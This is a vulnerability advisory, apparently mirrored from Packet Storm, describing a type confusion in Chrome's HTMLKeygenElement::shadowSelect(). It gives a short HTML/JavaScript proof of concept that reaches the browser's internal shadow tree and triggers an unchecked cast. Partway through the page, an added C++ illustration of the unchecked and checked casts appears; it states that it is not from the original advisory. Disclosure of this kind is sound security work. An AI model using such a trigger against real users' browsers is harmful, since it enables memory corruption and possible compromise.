Google Chrome HTMLKeygenElement::shadowSelect() Type Confusion

2017-02-01T00:00:00
ID PACKETSTORM:140861
Type packetstorm
Reporter Google Security Research
Modified 2017-02-01T00:00:00

Description

                                        
                                            ` Google Chrome: Type confusion in HTMLKeygenElement::shadowSelect()   
  
  
  
  
Chrome bug:  
https://bugs.chromium.org/p/chromium/issues/detail?id=666246  
  
PoC:  
  
<keygen id="keygen_element" style="position:absolute; height: 100px; width: 100px;">  
<script>  
var range = document.caretRangeFromPoint(50, 50);  
var shadow_tree_container = range.commonAncestorContainer;  
shadow_tree_container.prepend("foo");  
keygen_element.disabled = true;  
</script>  
  
What happens here:  
1. caretRangeFromPoint() allows accessing (and modifying) userAgentShadowRoot from JavaScript  
2. HTMLKeygenElement::shadowSelect() blindly casts the first child of the userAgentShadowRoot to HTMLSelectElement without checking the Node type.  
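The following is an added example, not code from the advisory or from Chromium: a reduced C++ model of the unchecked downcast described in point 2 next to a type-checked form, exercised on the same tree shape the PoC produces (a text node prepended ahead of the inner select). Every class and function name below is an assumption for illustration, not Blink's real API.

```cpp
// Simplified model of a Blink-style node tree; assumption: these are not Blink's real classes.
#include <memory>
#include <utility>
#include <vector>

struct Node {
    enum class Kind { Text, Select, Other };
    explicit Node(Kind k) : kind(k) {}
    virtual ~Node() = default;
    Kind kind;
    std::vector<std::unique_ptr<Node>> children;
    Node* firstChild() const { return children.empty() ? nullptr : children.front().get(); }
    // Same effect as the PoC's shadow_tree_container.prepend("foo")
    void prepend(std::unique_ptr<Node> n) { children.insert(children.begin(), std::move(n)); }
};
struct HTMLSelectElement : Node {
    HTMLSelectElement() : Node(Kind::Select) {}
    bool disabled = false;
};
struct Text : Node { Text() : Node(Kind::Text) {} };

// Vulnerable pattern from the advisory: the first child is assumed to be the <select>
// and downcast blindly. Kept for comparison only; never call it on a script-reachable tree.
HTMLSelectElement* shadowSelectUnchecked(Node& shadowRoot) {
    return static_cast<HTMLSelectElement*>(shadowRoot.firstChild());
}

// Hardened form: verify the node type before the downcast, nullptr otherwise.
HTMLSelectElement* shadowSelectChecked(Node& shadowRoot) {
    Node* first = shadowRoot.firstChild();
    if (!first || first->kind != Node::Kind::Select) return nullptr;
    return static_cast<HTMLSelectElement*>(first);
}

// Models "keygen_element.disabled = true", which forwards to the inner <select>.
// Returns false instead of writing through a mis-typed pointer.
bool setKeygenDisabled(Node& shadowRoot, bool disabled) {
    HTMLSelectElement* select = shadowSelectChecked(shadowRoot);
    if (!select) return false;
    select->disabled = disabled;
    return true;
}

// UA shadow root with its <select> first; optionally a text node is prepended,
// as the PoC does once caretRangeFromPoint() hands the shadow root to script.
std::unique_ptr<Node> buildShadowRoot(bool prependText) {
    auto root = std::make_unique<Node>(Node::Kind::Other);
    root->children.push_back(std::make_unique<HTMLSelectElement>());
    if (prependText) root->prepend(std::make_unique<Text>());
    return root;
}
```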
  
  
This bug is subject to a 90 day disclosure deadline. If 90 days elapse  
without a broadly available patch, then the bug report will automatically  
become visible to the public.  
  
  
  
  
Found by: ifratric  
  